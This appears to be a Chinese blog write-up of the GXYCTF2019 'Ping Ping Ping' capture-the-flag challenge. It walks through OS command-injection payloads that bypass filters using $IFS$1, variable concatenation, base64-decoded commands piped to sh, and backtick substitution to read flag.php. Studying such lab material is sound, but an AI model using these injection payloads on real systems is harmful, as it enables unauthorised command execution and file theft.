[GXYCTF2019]Ping Ping Ping1

  • 开发
  • 19

打开靶机

结合题目名称,考虑是命令注入,试试ls

 结果应该就在flag.php。尝试构造命令注入载荷。 cat flag.php

可以看到过滤了空格,用 $IFS$1替换空格

 还过滤了flag,我们用字符拼接的方式看能否绕过,a=g;cat$IFS$1fla$a.php。注意这里用分号间隔,所以不能用管道符连接了。

可以看到flag了。这里有个坑,这段是纯php代码,所以在页面上没有显示出来,要注意观察界面的源码。

其实可以先看一下index.php

 基本上可以看到过滤了哪些内容。所以还可以用base64编码绕过过滤  

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

既然ls能把flag找出来, 则还可以利用内联的方式获取flag  cat$IFS$1`ls`

 放一个命令注入的介绍:命令注入以及常见绕过方式_命令注入如何绕过空色-CSDN博客

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-18 01:52:02       67 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-18 01:52:02       72 阅读

  9. 在Django里面运行非项目文件

    2024-07-18 01:52:02       58 阅读

  19. Python语言-面向对象

    2024-07-18 01:52:02       69 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-18 01:52:02       64 阅读

热门阅读

  1. tomcat如何进行调优?

    2024-07-18 01:52:02       17 阅读

  2. C#调用非托管dll的两种方式

    2024-07-18 01:52:02       22 阅读

  5. WEB渗透之相关概念(笔记)

    2024-07-18 01:52:02       22 阅读

  9. idea 运行异常 gradle 项目

    2024-07-18 01:52:02       21 阅读

  11. C++ Primer:3.6 多维数组

    2024-07-18 01:52:02       26 阅读

  19. 设计模式大白话之适配器模式

    2024-07-18 01:52:02       25 阅读